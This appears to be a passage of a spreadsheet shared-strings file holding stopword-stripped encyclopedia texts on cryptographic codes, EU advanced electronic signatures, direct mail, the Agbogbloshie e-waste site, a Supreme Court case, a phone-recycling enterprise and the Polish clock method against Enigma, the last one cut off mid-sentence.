    <t>Code (cryptography)</t>
  </si>
  <si>
    <t>cryptology, code method used encrypt message operates level meaning; words phrases converted something else. code might transform "change" "cvgdk" "cocktail lounge". u.s. national security agency defined code substitution cryptosystem plaintext elements primarily words, phrases, sentences, code equivalents (called "code groups") typically consist letters digits both) otherwise meaningless combinations identical length.": codebook needed encrypt, decrypt phrases words. contrast, ciphers encrypt messages level individual letters, small groups letters, even, modern ciphers, individual bits. messages transformed first code, cipher. such multiple encryption, "superencryption" aims make cryptanalysis difficult. another comparison codes ciphers code typically represents letter groups letters directly without mathematics. numbers configured represent three values: 1001 1002 1003 resulting message, would 1001 1002 1003 communicate abc. ciphers, however, utilize mathematical formula represent letters groups letters. example, thus message results multiplying letter's value message abc, would codes variety drawbacks, including susceptibility cryptanalysis difficulty managing cumbersome codebooks, ciphers dominant technique modern cryptography. contrast, codes representational, susceptible mathematical analysis individual codebook elements. example, message cracked dividing number ranking alphabetically. however, focus codebook cryptanalysis comparative frequency individual code elements matching frequency letters within plaintext messages using frequency analysis. example, code group, 1001, 1002, 1003, might occur frequency might match number times occurs plain text messages. past, non-technical contexts, code cipher often used refer form encryption). one- two-part codes codes defined "codebooks" (physical notional), dictionaries codegroups listed corresponding plaintext. codes originally codegroups assigned 'plaintext order' convenience code designed, encoder. example, code using numeric code groups, plaintext word starting would low-value group, starting would high-value group. codebook could used "encode" plaintext message coded message "codetext", "decode" codetext back plaintext message. order make life difficult codebreakers, codemakers designed codes predictable relationship codegroups ordering matching plaintext. practice, meant codebooks required, find codegroups encoding, look codegroups find plaintext decoding. such "two-part" codes required effort develop, twice much effort distribute (and discard safely replaced), harder break. zimmermann telegram january 1917 used german diplomatic "0075" two-part code system contained upwards 10,000 phrases individual words. one-time code one-time code prearranged word, phrase symbol intended used convey simple message, often signal execute abort plan confirm succeeded failed. one-time codes often designed included would appear innocent conversation. done properly almost impossible detect, though trained analyst monitoring communications someone already aroused suspicion might able recognize comment like "aunt bertha gone labor" ominous meaning. famous example time codes include: bible, jonathan prearranges code david, going hiding jonathan’s father, king saul. archery practice, jonathan tells servant retrieving arrows "the arrows side you," it’s safe david return court, command "the arrows beyond you," david must flee. "one land; sea" "paul revere's ride" made famous poem henry wadsworth longfellow "climb mount niitaka" signal japanese planes begin attack pearl harbor during world british broadcasting corporation's overseas service frequently included "personal messages" part regular broadcast schedule. seemingly nonsensical stream messages read announcers actually time codes intended special operations executive (soe) agents operating behind enemy lines. example might "the princess wears shoes" "mimi's asleep table". each code message read twice. means, french resistance instructed start sabotaging rail transport links night d-day. "over spain, clear" signal (broadcast radio) start nationalist military revolt spain july 1936.sometimes messages prearranged rely shared knowledge hopefully known recipients. example telegram sent u.s. president harry truman, potsdam conference meet soviet premier joseph stalin, informing truman first successful test atomic bomb. "operated morning. diagnosis complete results seem satisfactory already exceed expectations. local press release necessary interest extends great distance. groves pleased. returns tomorrow. keep posted."see also one-time pad, unrelated cypher algorithm idiot code idiot code code created parties using this type communication akin hand signals used armies field. example: sentence 'day' 'night' used means 'attack'. location mentioned following sentence specifies location attacked. plaintext: attack codetext: walked night streets find tomorrow we'll head x.an early term appears george perrault, character science fiction book friday robert heinlein: simplest sort code] thereby impossible break. first told person persons concerned carry number seven expect number seven said something something designated seven. this says respect code item number ten. meaning numbers cannot deduced statistical analysis code changed long useful statistical universe reached. it's idiot code... idiot code never broken user good sense often well.terrorism expert magnus ranstorp said carried september attacks united states used basic e-mail calls "idiot code" discuss plans. cryptanalysis codes while solving monoalphabetic substitution cipher easy, solving even simple code difficult. decrypting coded message little like trying translate document written foreign language, task basically amounting building "dictionary" codegroups plaintext words represent. fingerhold simple code fact words common others, "the" english. telegraphic messages, codegroup "stop" (i.e., sentence paragraph) usually common. this helps define structure message terms sentences, meaning, cryptanalytically useful. further progress made code collecting many codetexts encrypted code using information sources spies newspapers diplomatic cocktail party chat location message sent sent (i.e., traffic analysis) time message sent, events occurring message sent normal habits people sending coded messages etc.for example, particular codegroup found almost exclusively messages particular army nowhere else might well indicate commander army. codegroup appears messages preceding attack particular location well stand location. cribs immediate giveaway definitions codegroups. codegroups determined, gradually build critical mass, codegroups revealed context educated guesswork. one-part codes vulnerable educated guesswork two-part codes, since codenumber "26839" one-part code determined stand "bulldozer", lower codenumber "17598" likely stand plaintext word starts "b". least, simple part codes. various tricks used "plant" "sow" information coded message, example executing raid particular time location enemy, examining code messages sent raid. coding errors particularly useful fingerhold code; people reliably make errors, sometimes disastrous ones. planting data exploiting errors works ciphers well. obvious and, principle least, simplest cracking code steal codebook bribery, burglary, raiding parties procedures sometimes glorified phrase "practical cryptography" weakness codes ciphers, though codebooks generally larger used longer cipher keys. while good code harder break cipher, need write distribute codebooks seriously troublesome.constructing code like building language writing dictionary especially computers. code compromised, entire task must done again, means work cryptographers code users. practice, codes widespread use, usually changed periodic basis frustrate codebreakers, limit useful life stolen copied codebooks. once codes created, codebook distribution logistically clumsy, increases chances code compromised. there saying "three people keep secret dead," (benjamin franklin wikiquote) though something exaggeration, secret becomes harder keep shared among several people. codes thought reasonably secure used careful people, whole armies codebook, security becomes much difficult. contrast, security ciphers generally dependent protecting cipher keys. cipher keys stolen people betray them, much easier change distribute. superencipherment common encipher message first encoding increase difficulty cryptanalysis. with numerical code, commonly done "additive" simply long number digit-by-digit added code groups, modulo unlike codebooks, additives would changed frequently. famous japanese navy code, jn-25, design. references sources kahn, david (1996). codebreakers comprehensive history secret communication ancient times internet. scribner. pickover, cliff (2000). cryptorunes: codes secret writing. pomegranate communications. isbn 978-0-7649-1251-1. boak, david (july 1973) [1966]. "codes" (pdf). history u.s. communications security; david boak lectures, vol. (2015 declassification review ed.). george meade, u.s. national security agency. 21–32. retrieved 2017-04-23. american army field codes american expeditionary forces during first world war, william friedman, u.s. department, june 1942. exhibits many examples appendix, including "baseball code" 254) also cipher code, general communications meaning trench code jn-25 zimmermann telegram code talkers this article, earlier version incorporates material greg goebel's codes, ciphers, codebreaking.</t>
  </si>
  <si>
    <t>Advanced electronic signature</t>
  </si>
  <si>
    <t>advanced electronic signature (ades) electronic signature requirements forth regulation 910/2014 (eidas-regulation) electronic identification trust services electronic transactions european single market. description eidas created standards electronic signatures could used secure manner conducting business online, electronic fund transfer official business across borders member states. advanced electronic signature standards outlined eidas. electronic signature considered advanced, must meet several requirements: signatory uniquely identified linked signature signatory must sole control signature creation data (typically private key) used create electronic signature signature must capable identifying accompanying data tampered message signed event accompanying data changed, signature must invalidatedadvanced electronic signatures compliant eidas technically implemented ades baseline profiles developed european telecommunications standards institute (etsi): xades, advanced electronic signatures extensions xml-dsig recommendation making suitable advanced electronic signatures. pades, advanced electronic signatures restrictions extensions 32000-1 making suitable advanced electronic signature. cades, advanced electronic signatures extensions cryptographic message syntax (cms) signed data making suitable advanced electronic signatures. asic baseline profile. asic (associated signature containers) specifies container structures bind together signed objects either advanced electronic signatures time-stamp tokens single digital (zip) container. vision implementation advanced electronic signatures specification eidas serves several purposes. business public services processes, even across borders safely expedited using electronic signing. with eidas, states required establish “points single contact” (pscs) trust services ensure electronic schemes used public sector transactions occur cross-borders, including access healthcare information across borders.in past, signing document message, signatory would sign return intended recipient postal service, facsimile service, scanning attaching email. this could lead delays course, possibility signatures could forged documents altered, especially multiple signatures different people located different locations required. process using advanced electronic signature saves time, legally binding assures high level technical security. legal implications following article eidas regulation, advanced electronic signature shall "not denied legal effect admissibility evidence legal proceedings". however reach higher probative value enhanced level qualified electronic signature. adding certificate issued qualified trust service provider attests authenticity qualified signature, upgraded advanced signature carries according article eidas regulation legal value handwritten signature. however, regulated european union similarly zertes switzerland. qualified electronic signature defined united states. also trusted timestamping qualified electronic signature references</t>
  </si>
  <si>
    <t>Advertising mail</t>
  </si>
  <si>
    <t>advertising mail, also known direct mail senders), junk mail recipients), mailshot admail (north america), letterbox drop letterboxing (australia) delivery advertising material recipients postal mail. delivery advertising mail forms large growing service many postal services, direct-mail marketing forms significant portion direct marketing industry. some organizations attempt help people receiving advertising mail, many cases motivated concern negative environmental impact. advertising mail includes advertising circulars, plastic mailers, coupon envelopes (money mailer, valpak), catalogs, cds, "pre-approved" credit card applications, commercial merchandising materials delivered homes businesses. addressed pre-selected individuals, unaddressed delivered neighbourhood-by-neighbourhood basis. postal services postal systems offer lower rates buyers bulk mail permits. order qualify rates, marketers must format sort mail specific ways reduces handling required postal service. income advertising mail represents significant growing portion postal services' budgets, service actively marketed them. united states, mail dollars decreased $96.6 billion 2004, $80.9 billion 2013. study boston consulting group predicts overall share ad-spend increase 2020. canada, addressed unaddressed advertising mail accounted canada post's revenue 2005, share increasing. postal services employ terms advertising mail, admail, direct mail, avoiding objecting pejorative term junk mail.the united states postal service offers direct mail service known every door direct mail, provides resources allowing businesses target, design, print mail specific households without needing know addresses. many developed countries, advertising mail represents significant growing amount total volume mail. united states, "standard mail: advertising" comprised mail 1980 2003. direct mail marketing direct mail common form direct marketing, employed for-profit businesses, charities non-profits, political campaigns, organizations. direct mail encompasses wide variety marketing materials, including brochures, catalogs, postcards, newsletters sales letters. 2015 million direct mail promotions sent reported respondents scanning reading mail. creation copywriters write words, also known copy, direct mail. these copywriters known inside trade direct response copywriters. direct response copy follows proven format based testing results. graphic designers specialize direct marketing also play role success direct mail programs. many direct mail marketers mail different version copy (a/b testing) test effectiveness different appeals. winning mail package known control direct mail company continue mail control different package produces improved results, usually measured metrics revenue conversion rate. targeting advertisers often refine direct mail practices targeted mailing mail sent following database analysis select recipients considered likely respond positively. this reduces costs mailers narrowing mailing universe likely audience. example, person demonstrated interest golf receive direct mail golf-related products perhaps goods services appropriate golfers. this database analysis type database marketing. alternatively, unaddressed direct mail sent neighbourhood-by-neighbourhood basis. whether individual neighbourhood level, direct mail marketing allows recipients targeted, attempting match demographic profile recipients closely matching likely customers. individually targeted direct mail tailored based previous transactions gathered data. example, male recipients offer receive personalized package man's picture cover female recipients receive picture woman. often advertisers include johnson letters. these aimed drawing targeted consumers reading letter. cost-effectiveness non-professional, direct mail seem wasteful, medium cost-effective. database targeting combined effective pricing, creative list strategy reduce waste maximize profitable results mailer. testing accomplished variety ways including split testing mailings versus control testing lists "nth" name selects. political usage political campaigns make frequent direct mail, gain votes electorate whole, target certain groups voters thought open candidate's message appeal campaign funds. certain organizations individuals become known prowess direct mail, including free congress foundation 1970s, response dynamics, inc. 1980s, national congressional club, richard viguerie. with advent internet political campaigns, direct mail became many campaign management tools, still played significant role. nonprofit nonprofit companies direct mail marketing consistent form advertising. modern form, direct mail fundraising appeared united states world nationwide charities national easter seal society sought ways broaden fundraising base. advent 1960s code and, later, computer direct mail fundraising began gain wide use. before code, difficult target appropriate recipients direct mail fundraising appeals, computer, compiling maintaining lists supporters tedious costly. during 1970s, computers became increasingly affordable, direct mail fundraising spread widely. quickly became means americans learned first provided financial support charities choice. explosive growth nonprofit sector united states quadrupling 1980s doubling 1990s early 2000s massive expansion direct mail build sustain large, nationwide donor membership lists. today, direct mail fundraising accounts least one-fifth $250 billion contributed annually u.s. nation's million nonprofit organizationsdirect mail fundraising unique jargon, much related science creating, producing mailing right appeal right list right time, measuring results.in recent years, electronic communication media used commonly among nonprofits. online, email, social media campaigns, collectively referred digital fundraising, used coordination direct mail fundraising. nonprofits supplement direct mail campaigns email blasts social media posts, using similar messaging visuals various communications together. however, digital fundraising grown fast enough replace direct mail nonprofits. 2012, digital fundraising accounted percent charitable donations united states.this form marketing increasingly used charitable groups 2013, £239 million spent british charities direct mail advertising campaigns. current relevance direct mail marketing scrutiny many former current advocates. arguments using direct mail marketing include possible impact environment changing attitudes among consumers. united states, common practice address standardization defeat purpose advertising mail stripping away local identity, thus leaving many recipients alienated. also argued direct mail cost-efficient. suggested social media eventually replace direct mail preferred method marketing communications. those believe direct mail marketing future cite strong growth 2011. reported large publishers like tribune company donnelley growing direct mail divisions. nonprofit organizations continue direct mail subsidized usps rate. business-to-business mailings (b2b) when targeted businesses rather individuals, direct mail known business-to-business mailing. traditionally, worked ways: direct sale, therefore precluding salesperson retail store, method generating leads salesforce. former method ideally used products easy sell, familiar prospect needed demonstration. latter method used large-ticket items needed demonstration, example. method direct mailing used known "bill-me." direct-mail marketing offer, buyer shipped product prior payment sent invoice later. opting several organizations offer opt-out services people wish reduce eliminate amount addressed advertising mail receive. mailing preference service allows people register removal posted opposed hand-delivered mail. 2017 united states organizations offering services include catalog choice dmachoice. similar organization name 41pounds.org received customer complaints became defunct. another name tonic mailstopper (formerly greendimes) longer appears business either.several websites critical junk mail guides people interested reducing amount junk mail get, center american dream.in response supreme court ruling (rowan post office dept., u.s. (1970)), united states postal service enables applicant obtain prohibitory order, gives people power stop non-governmental organizations sending mail, demand organizations remove consumers’ information mailing lists. canada, highly publicized campaign offers advice reducing unaddressed advertising mail. campaign focuses advertising canada post policy respect junkmail" signs, noting policy promoted canada post itself. name "red dot" refers internal marker used canada post indicate households wish receive unaddressed admail.the royal mail also offers opt-out service, though unaddressed government mailings cannot separated advertisements, opted latter would stop receiving former well. criticism environmental effect several organizations, well environmental groups, express concern environmental impact generated direct mail. environmental protection agency estimates junk mail discarded without opened read, equalling four million tons waste paper year, recovered recycling. further, ohio office compliance assistance pollution prevention (ocapp) estimates 250,000 homes could heated single day's junk mail (70,000,000,000,000/3 btus energy 28,870,000,000/21 energy).in minister state responsible department environment, food rural affairs estimated "direct mail promotions" accounted 500,000 600,000 tonnes paper 2002, recycled. government direct marketing association (uk) together agreed recycling targets direct mail industry, including goal 2009, though dma's latest estimates industry fall well short mark.mike berners-lee estimates receiving five letters plus printed catalogs week results kilograms (1,060 co2e year.a york times article 2009 states united states 51.5 million metric tons greenhouse gases emitted year mail advertisements. environmental protection agency indicates 2009 total greenhouse emissions 6,700.10 million metric tons. privacy issues recipients conceive advertising mail privacy problem, generation requires extensive collection information, receipt mail intrusion home. numerous public opinion polls found americans find advertising mail intrusive, instance, june 2003, internet american life project found percent americans found, "junk mail delivered postal service" intrusion percent found intrusion. researchers university california recently found four five americans favor do-not-mail law, similar existing do-not-call telemarketing registry. attention advertising mail criticized form attention theft. also direct marketing direct mail fundraising direct response marketing direct marketing associations references external links direct marketing association (dma) junk mail opt-out modes delivery customer engagement advertising mail united states postal service comprehensive guide direct marketing phase approach</t>
  </si>
  <si>
    <t>Agbogbloshie</t>
  </si>
  <si>
    <t>agbogbloshie nickname commercial district korle lagoon odaw river, near center accra, ghana's capital city greater accra region. near slum called "old fadama", agbogbloshie site became known destination externally generated automobile electronic scrap collected mostly western world. alleged center legal illegal exportation network environmental dumping electronic waste (e-waste) industrialized nations. basel action network, small based seattle, referred agbogbloshie "digital dumping ground", allege millions tons e-waste processed year.however, repeated international studies failed confirm allegations, labelled "e-waste hoax" international reuse advocate wr3a. exhaustive study trade used electronics nigeria, funded united nations environment programme (unep) basel convention, revealed tonnes informally processed waste electronics, material recovered.according statistics world bank, large cities like accra lagos, majority households owned televisions computers decades. report "where weee africa" (2012) disclosed majority used electronics found african dumps fact recently imported scrap, originated african cities. agbogbloshie situated banks korle lagoon, northwest accra's central business district. roughly 40,000 ghanaians inhabit area, migrants rural areas. harsh living conditions rampant crime, area nicknamed "sodom gomorrah".the basel convention prevents transfrontier shipment hazardous waste developed less developed countries. however, convention specifically allows export reuse repair annex b1110. while numerous international press reports made reference allegations majority exports ghana dumped, research international trade commission found little evidence unprocessed e-waste shipped africa united states, finding corroborated massachusetts institute technology, memorial university, arizona state university, unep, research. 2013, original source allegation blaming foreign dumping material found agbogbloshie recanted, rather stated never made claim e-waste exported.whether domestically generated residents ghana imported, concern remains methods waste processing especially burning emit toxic chemicals air, land water. exposure especially hazardous children, toxins known inhibit development reproductive system, nervous system, especially brain. concerns human health environment agbogbloshie continue raised area remains heavily polluted. 2000s, ghanaian government, funding loans, implemented korle lagoon ecological restoration project (klerp), environmental remediation restoration project address pollution problem dredging lagoon odaw canal improve drainage flooding ocean. background 1960s, slum area agbogbloshie wetland. city accra urbanized, ghetto grew, referred fadama ayaalolo. during 1980s, ghetto place shelter refugees konkomba-nanumba war. late 1990s, newly available electricity akosombo increased local demand electric electronic appliance consumption. critics claim caused imbalanced shift.the electricity akosombo increased demand functional second-hand televisions computers, imported west africa's tech sector help ‘bridge digital divide’. ghanaians welcomed donations, computers cost one-tenth price one. basel action network circulated claim 2008 much percent second-hand electronics sent africa could reused ended landfills.the allegation slightly different 2002 claim waste became cited references academic journals, though documentation peer reviewed source documentation made available. 2013 denied ever making claim, ever stating statistic african imports. economy local economy agbogbloshie based onion market serving immigrants accra greater tamale region (dagbani) north. unemployed immigrants turned scrap metal collection, including auto scrap, supplement incomes. electronic scrap processing fairly small activity market. claim "hundreds millions tons electronic waste imported area year", reported several news sources, considered experts utterly ridiculous preposterous. clear united states leading exporter e-waste ghana, although imports arrive countries france, germany, korea, switzerland netherlands. multinational brands philips, canon, dell, microsoft, nokia, siemens sony commonly found throughout waste. according e-waste assessment studies, "refurbishing sales used important economic sector (e.g. alaba market lagos). well-organized dynamic sector holds potential industrial development. indirectly, sector another important economic role, supplies middle income households affordable equipment eee. view sector’s positive socio-economic performance, policy measures aiming improve e-waste management nigeria refrain undifferentiated banning second-hand imports refurbishing activities strive co-operative approach including market sector associations." followers alleged non-governmental organizations (ngos) adding waste excess electronics donated intention helping scholarly institutions. they claim, based 75%-80% orphaned waste statistic, exporters must found numerous loopholes avoid legislation forbidding e-waste shipping, labeling broken electronics ‘end-of-life’ ‘second-hand-goods’, falsely identifying working order. true electronics imported unable salvaged remain land, import would illegal. however, studies failed find evidence allegation, source dumping statistic denied young burning wires auto harnesses electronics subject several photojournal essays. workers, mostly young men, disassemble cars, appliances, scrap electronics gathered wheeled push carts accra neighborhoods. revenue recovery metals copper, aluminum iron, produce wages. several british news outlets made recycling workers cause celebre. photographs workers burning wire tires plastic order melt plastic, dismantling waste bare hands stones, popularized press. magnets electronics shown used gather smallest ferrous metal scraps. remaining materials burned dumped nearby.the workers, children adults alike, sell metal scraps earn living. half sack copper aluminum sell ₵700, amounting ₵8‑10 ghana cedis (us$4‑6). living conditions population agbogbloshie consists economic migrants northern rural parts ghana, living standards growing worse, causing people move urban settings, agbogbloshie. conditions significantly better, making living easier. inhabitants agbogbloshie live, eat, work relieve land amongst waste. children able attend school often spend every evening weekend processing waste searching metals.dwellings wooden shacks lack water sanitation. area also home armed robbers, prostitutes, drug dealers others involved underground markets. crime disease rampant throughout agbogbloshie, creating almost uninhabitable environment humans. outsiders nicknamed area “sodom gomorrah,” condemned biblical cities, harsh living conditions agbogbloshie. pollution processing dumping electronic waste agbogbloshie polluting area creating serious environmental concern. photographs agbogbloshie e-waste landfill show scrap workers burning wires auto harnesses plastic-encased electronics recover copper. e-waste contains toxic chemicals emitted ground, water atmosphere electronics broken down, burned processed. poisons lead, mercury, arsenic, dioxins, furans, brominated flame retardants seep surrounding soil water, thereby seriously polluting landscape. greenpeace tests shown water soil areas agbogbloshie revealed area contained concentrations chemicals levels hundred times allowable amount. several studies confirmed high levels lead soil particular risks workers children. environmental lead contamination predominantly burning plastic covering copper wires. insulation contains approximately 3000 mg/kg lead stiffener, lead released burning.the guardian april 2019 reported study ipen basel action network found dangerous levels dioxins polychlorinated biphenyls (pcbs) chicken eggs agbogbloshie.lead containing glass used computer monitors (crt tubes) also contributes elevated soil lead levels. korle lagoon, agbogbloshie situated, extremely levels dissolved oxygen, result large uncontrolled quantities domestic industrial waste emitted water. studies indicate entrance lagoon severely polluted suitable primary secondary contact, large amounts bacteria present. human health risks processing electronic waste presents serious health threat workers agbogbloshie. fumes released burning plastics metals used electronics composed highly toxic chemicals carcinogens. workers often inhale lead, cadmium, dioxins, furans, phthalates brominated flame retardants. exposure fumes especially hazardous children, toxins known inhibit development reproductive system, nervous system, brain particular. similar e-waste processing areas, conditions demographics like agbogbloshie, children dangerous levels lead blood. inhabitants often suffer chronic nausea, headaches, chest respiratory problems.high levels toxins also discovered soil food samples, chemicals stay food chain. information security e-waste presents potential security threat individuals exporting countries. hard drives properly erased computer disposed reopened, exposing sensitive information. credit card numbers, private financial data, account information records online transactions accessed willing individuals. organized criminals ghana commonly search drives information local scams.government contracts discovered hard drives found agbogbloshie. multimillion-dollar agreements united states security institutions defense intelligence agency (dia), transportation security administration homeland security resurfaced agbogbloshie. restoration efforts ghanaian government made effort restore area “korle lagoon ecological restoration project” (klerp). 2003, opec fund international development, arab bank economic development africa, kuwait fund arab economic development provided loan project expectation ghanaian government dredge lagoon restore surroundings. other goals project include reduction flooding, increase marine life, improvement water quality improvement general sanitary conditions.due invasive nature project, restoration efforts disputed inhabitants agbogbloshie. klerp requires people leave area, home majority squatters. accra metropolitan assembly (ama) continually tried evict people, much resistance. matter still dispute.in 2014, pure earth (formally blacksmith institute) funded creation copper wire recycling center within agbogbloshie helped install several automated machines simplify removal plastic coating reduce burning. efforts appear moderately successful; however, burning continues. since 2017, german government supports ghana introducing sustainable e-waste management country. e-waste programme implemented deutsche gesellschaft internationale zusammenarbeit partnership ghanaian ministry environment science technology innovation (mesti). march 2019 training facility, ghana health service clinic football pitch completed commissioned. references popular culture official video placebo cover talk talk's song "life's what make starts "this film dedicated workers agbogbloshie", ends "when cellphone, computer home appliances, cast-offs often voyage across oceans agbogbloshie. agbogbloshie former wetland, home world's largest electronic waste dumps. here, young boys smash burn electronic devices salvage metals inside them". whole video shot site agbogbloshie. murder mystery children street, ghanaian author kwei quartey, partially agbogbloshie, references e-waste salvaging industry. also guiyu (town), electronic waste site china references external links inside massive electronics graveyard atlantic, december 2014 placebo life's what make (official video) youtube</t>
  </si>
  <si>
    <t>Union Pacific Railway Co. v. Botsford</t>
  </si>
  <si>
    <t>union pacific railway company botsford, u.s. (1891), case united states supreme court. background railroad passenger, clara botsford, sustained permanent injuries brain spinal cord berth sleeping fell upon head. sued railroad negligence construction railroad allegedly caused injuries. union pacific railway company claimed entitled, without consent, opportunity surgically examine determine diagnosis extent injuries. decision court disagreed, holding authority common statutory trial court order examination: right held sacred, carefully guarded common law, right every individual possession control person, free restraint interference others, unless clear unquestionable authority law." also union pacific cheyenne (1885) kansas pacific dunmeyer (1885) brushaber union pacific railroad (1916) union pacific railroad brotherhood locomotive engineers (2009) references external links text union pacific railway company botsford, u.s. (1891) available from: justia library congress</t>
  </si>
  <si>
    <t>Closing the Loop</t>
  </si>
  <si>
    <t>closing loop company offers closed loop service mobile phones. dutch social enterprise based amsterdam, netherlands. founded reduce electronic waste (e-waste). offering users sellers phones make device material-neutral waste free. company pays people emerging markets collect scrap phones. these phones recycled closing loop’s customers. proposition works basis, customer’s phone ‘offset’ recycling broken phone. known customers t-mobile, kpmg, city utrecht, rabobank dutch national government. closing loop buys collects 'end-of-life' scrap phones african countries, known places many used phones europe second life. waste closing loop collects, recycled europe. closing loop turns scrap phones valuable resources income people developing countries. goal prevent mobile phones ending dump sites time create sustainable telecom industry. impact closing loop saved million mobile phones dump africa gave 145,000 mobile phones second life. mobile phones bought informal local collector networks. date, closing loop helped 2,000 people africa earn additional income safe employment.the social enterprise sees e-waste opportunity. opportunity source companies responsibly sourced metals, make industries like telecom circular closing loops create income people emerging markets. aims contribute circular economy sustainable development goals. history closing loop founded 2012 joost kluijver. joost started make electronic industry aware impact e-waste. although recognized e-waste major problem, industry clearly needed awareness topic e-waste. joost team therefore took initiative showed metals inside broken mobile phones still value contain gold, silver, copper recyclable metals. closing loop network collectors african countries 2015 first container filled mobile phones shipped ghana europe proper recycling. electronic waste when lifespan, scrap mobile phones often dumped become hazard environment human health. example, landfills like agbogbloshie, e-waste dumped people make living burning electronics extract metals. fumes released toxic. references</t>
  </si>
  <si>
    <t>Clock (cryptography)</t>
  </si>
  <si>
    <t>cryptography, clock method devised polish mathematician-cryptologist jerzy różycki, polish general staff's cipher bureau, facilitate decrypting german enigma ciphers. method determined rightmost rotor german enigma exploiting different turnover positions. poles, learning rightmost rotor reduced rotor-order search space factor (the number rotors). british improved method, allowed limited number bombes effectively (the british confronted rotors). method this method sometimes made possible determine enigma machine's rotors right, position rotor always revolved every depression key. clock method developed jerzy różycki 1933–1935.marian rejewski's grill method could determine right-hand rotor, involved trying possible rotor permutation (there three rotors time) possible starting rotations. grill method tests also complicated plugboard settings. contrast, clock method involved simple tests unaffected plugboard.in early 1930s, determining rotor order significant burden germans used rotor order three months time. rotor order could determined once, order could used next three months. february 1936, germans changed rotor order every month. november 1936, germans changed rotor order every day.różycki's "clock" method later elaborated british cryptologist alan turing bletchley park development cryptological technique called "banburismus." background cipher bureau received german radio intercepts enciphered enigma machine. with messages, bureau could determine marian rejewski's characteristic structure message encoding. exploiting poor message keys, bureau could determine message encoding. point, cryptanalysts know message keys ciphertext. they know secrets daily plugboard setting, ring settings, rotor order, initial setting. with little information luck, poles could still determine rotor rightmost. daily traffic, might dozen message pairs whose message starts letters. that means left middle rotors position. there ways align ciphertexts message pair. both alignments tried; alignments identical polyalphabetic substitution. from that, cryptanalyst determine rotor turnover happened within particular range letters. rotors different turnover positions. british used mnemonic "royal flags wave kings above", meant rotor turned rotor turned rotor turned rotor turned rotors turned message pairs cooperated, poles could narrow window turnover happens include rotor. message pair might turnover happened window meant rotors (r), (f), viable. second message pair might produce window meant rotors (r), (w), viable. only rotor satisfies message pairs, rotor right-hand rotor. machine settings enigma cipher machine relied users shared secrets. here secret daily settings 1930 enigma manual: daily settings (shared secret): rotor order ringstellung (xmv) reflector plugboard a-m, f-i, n-v, p-s, t-u, grundstellung: (fol) daily settings told code clerks configure machine message could exchanged. initially, machine three rotors could arranged order (the wheel order rotor order). each rotor ring numbers letters ring could positions. plugboard interchanged additional characters. message, operator would choose three-letter message encrypt body message. intention random, using random message good security practice. message needed communicated recipient recipient could decrypt message. instead sending message keys clear, message keys would encrypted grundstellung (ground setting). grave procedural mistake, germans encrypted message twice. message "abl", germans would encrypt doubled "ablabl" send result ("pkpjxi"). sending message twice allowed keys garbled transmission recovered, cryptographic mistake encrypting doubled rather sending encrypted twice (e.g., "pkppkp"). doubled gave poles attack. sufficient message traffic using daily (about messages) code clerks used weak keys (such "ccc" "wer"), poles could rejewski's method characteristics determine day's message keys. surprisingly, poles cracked message keys without learning substantial secrets daily machine settings: plugboard settings, rotor order, rotor positions, ring settings. poles techniques remaining secrets; clock method helped determine rotor order. different rotors different turnover positions clock method exploited three rotors iii) different turnover positions. rightmost rotor moved character enciphered. certain position ring, enciphering character would also cause next rotor left move position turnover). ring position caused next rotor move different rotor: rotor advanced transition ("royal"); rotor advanced ("flags"); rotor advanced ("wave"). turnover could detected, rightmost rotor might identified. poles, cracked message key, knew ring positions message ring positions message key.with sufficient traffic, poles would find message keys started characters. poles received messages keys "aaa" "aat". message aaa: bqwbockuqfpqdjtmftysrddqeqjwlptnmhjenutpyulnprtckg message aat: srddqeqjwlptnmhjenutpyulnprtckgfhwqjtvqrovulgdmnmx index coincidence using index coincidence long enough message, poles could determine rotor settings coincide. that determination statistical, also subtle. exploits nonuniform letter frequency language. consider sentences letters aligned. letters frequency, letter first sentence would match letter position second sentence probability 1/26 (0.038). natural languages, characters much likely, chance coincidence much higher. here's case coincidences first characters (much expected 1.73 matches characters): weholdthesetruthstobeselfevident wheninthecourseofhumanevents index coincidence also holds true strings compared encrypted polyalphabetic key; characters equal, encryptions also equal. conversely, strings encrypted different polyalphabetic key, strings randomized index coincidence show random matches characters match). strings long enough (say characters), index coincidence give indication whether strings encrypted polyalphabetic (i.e., rotor configuration). rotor position coincidence emphasize index coincidence absurd level, example messages consist entirely letter "a", coincidences occur every position shares rotor positions (something would happen normal messages). that allows coincidence starkly obvious even short message. practice, long messages needed good statistical indication. poles searched daily traffic find pair messages whose keys started letters. example pairs would ("uib", "uiw") ("gce", "gcx"). chance first letters message match another message's small (1/(26×26)=1/576), finding pair messages likely; finding match example birthday problem. poles wanted first letters match meant left middle rotors identical rotations would produce permutation. poles could also align messages account differing third letter key. given ("aaa", "aat") example pair above, poles knew possible ways messages could aligned messages shared common (common rotor rotations). cases reflect whether turnover (movement middle rotor) happens "a". right rotor pos: abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz message aaa: bqwbockuqfpqdjtmftysrddqeqjwlptnmhjenutpyulnprtckg message aat: srddqeqjwlptnmhjenutpyulnprtckgfhwqjtvqrovulgdmnmx coincidence: =============================== conclusion: key, turnover a-t. right rotor pos: tuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrs message aat: srddqeqjwlptnmhjenutpyulnprtckgfhwqjtvqrovulgdmnmx message aaa: bqwbockuqfpqdjtmftysrddqeqjwlptnmhjenutpyulnprtckg coincidence: conclusion: different key, turnover middle rotor turnover different positions depending upon rotor rightmost (fast) position. change points rotors indicated position middle rotor given assuming right rotor iii. message aaa: bqwbockuqfpqdjtmftysrddqeqjwlptnmhjenutpyulnprtckg turnover right abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxy middle(i) aaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbcccccccc middle(ii) aaaaabbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccc middle(iii) aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbccc message aat: srddqeqjwlptnmhjenutpyulnprtckgfhwqjtvqrovulgdmnmx turnover right tuvwxyzabcdefghijklmnopqrstuvwxy middle(i) aaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb middle(ii) aaaaaaaaaaaabbbbbbbbbbbbbbbbbbbb middle(iii) aaabbbbbbbbbbbbbbbbbbbbbbbbbbccc language-based coincidences occur, three rotors must sync. not, plaintext would randomly scrambled language properties would show through. looking region coincidence occurs, observations made. rotor right, middle rotor never matches index coincidence would indicate 